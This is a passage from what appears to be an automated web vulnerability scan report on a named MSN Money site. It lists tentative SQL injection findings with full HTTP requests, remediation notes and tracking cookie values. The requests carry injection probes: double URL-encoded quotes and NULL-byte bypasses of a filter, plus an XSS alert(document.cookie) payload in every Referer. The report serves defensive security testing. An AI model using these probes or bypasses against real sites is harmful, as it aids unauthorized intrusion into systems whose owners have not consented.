Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:32 GMT
Accept-Ranges: bytes
ETag: "09090c1b8abcb1:1a400"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 19:55:15 GMT
Content-Length: 568


(function()
{String.prototype.setCookie=function(value,expiryDays,domain,path,secure)
{var builder=[this,"=",value];if(expiryDays)
{var date=new Date();date.setTime(date.getTime()+(expiryDays*864
...[SNIP]...

1.33. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [CULTURE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:24 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:24 GMT
Content-Length: 193


(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.34. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [v1st cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/getcookie.js

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:11 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/getcookie.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:11 GMT
Content-Length: 193


(function()
{String.prototype.getCookie=function()
{var re=new RegExp('\\b'+this+'\\s*=\\s*([^;]*)','i');var match=re.exec(document.cookie);return(match&&match.length>1?match[1]:'');};})();

1.35. http://redacted/inc/Views/Shared/Core/Content/js/utilities/stringutils.js [v1st cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utilities/stringutils.js

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:55:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utilities/stringutils.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:33 GMT
Accept-Ranges: bytes
ETag: "802629c2b8abcb1:16c4d"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:55:23 GMT
Content-Length: 576


(function()
{String.prototype.format=function()
{for(var fmt=this,ndx=0;ndx<arguments.length;++ndx)
{fmt=fmt.replace(new RegExp('\\{'+ndx+'\\}',"g"),arguments[ndx]);}
return fmt;};String.prototy
...[SNIP]...

1.36. http://redacted/inc/Views/Shared/Core/Content/js/utility.js [SRCHHPGUSR cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utility.js

Issue detail

The SRCHHPGUSR cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHHPGUSR cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHHPGUSR cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1%2527%2527; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:40:29 GMT
Accept-Ranges: bytes
ETag: "80ccc6bfb8abcb1:161bf"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:51 GMT
Content-Length: 753


(function($)
{$.extend({getQuoteDetailUrl:function(type,symbol,server)
{var url="/investments/stock-price?symbol=";if(type)
{switch(type.toUpperCase())
{case"PUTOPTION":url="/investments/trading
...[SNIP]...

1.37. http://redacted/inc/css/ww.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/css/ww.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc/css'/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css''/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Content-Length: 10099
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...

1.38. http://redacted/inc/css/ww.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/css/ww.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/css/ww.css HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Content-Length: 458
Content-Type: text/css
Last-Modified: Tue, 04 Jan 2011 02:38:39 GMT
Accept-Ranges: bytes
ETag: "9f373f7eb8abcb1:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:48 GMT
Connection: close

#wwFra{z-index:1000000;border:1px solid #666;line-height:1.33em;width:500px;display:none;position:absolute;font:10pt arial,sans-serif;color:#333}#wwTbl{width:100%}#wwTbl td{padding:.4em 1em;vertical-a
...[SNIP]...

1.39. http://redacted/inc/scr/ajaxquotes.js [Sample cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/ajaxquotes.js

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00'; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:54:23 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/ajaxquotes.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69%00''; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:24 GMT
Accept-Ranges: bytes
ETag: "0228fe0b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:54:24 GMT
Content-Length: 10160


if(typeof(Msn)=="undefined")
{Msn={};}
if(typeof(Msn.Money)=="undefined")
{Msn.Money={};}
if(typeof(Msn.Money.Quote)=="undefined")
{Msn.Money.Quote={};}
Msn.Money.Quote.Enums={Zero:{AsIs:0,NA:
...[SNIP]...

1.40. http://redacted/inc/scr/userchoice.js [MC1 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /inc/scr/userchoice.js

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /inc/scr/userchoice.js?v=634297056937135631 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT
Accept-Ranges: bytes
ETag: "803fbbe4b8abcb1:153c9"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:09:25 GMT
Content-Length: 600


function _usrChGetCrnt(key)
{var
opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;}
function _u
...[SNIP]...

1.41. http://redacted/inc/scr/userchoice.js [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
